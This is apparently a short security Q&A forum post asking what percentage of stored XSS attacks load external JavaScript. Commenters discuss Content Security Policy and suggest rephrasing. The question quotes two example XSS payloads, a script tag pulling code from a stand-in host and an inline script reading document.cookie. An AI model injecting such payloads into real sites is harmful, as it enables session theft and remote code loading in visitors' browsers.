# What percent of stored XSS attacks use external JavaScript?

Tags: xss

What % of XSS attacks use external JavaScript. For example:

```
<script src="http://badsite.com/maliciouscode.js"></script>
```

Instead of:

```
<script>alert(document.cookie);</script>
```

Any sources would be greatly appreciated.

Comment: Interesting question. You probably won't get a good answer here. The security monitoring firms who would be privy to such information tend to keep it secret. Although they do occasionally produce reports, so you may be in luck.

Comment: While the question looks interesting I'm not sure that the answer would be actually that much helpful in whatever you want to do with it. Attackers use the easiest way and as long as it is possible to include external script they will use it. If you restrict these possibilities with [Content Security Policy](http://www.html5rocks.com/en/tutorials/security/content-security-policy/) or similar techniques they will try to use other techniques. So a better and much harder to answer question would be how much of these attacks actually *require* the use of external resources.

Comment: Can you re-word the question to be something more like "what are the pros and cons of using an external script vs inline?" That is more answerable, and might provide some interesting answers.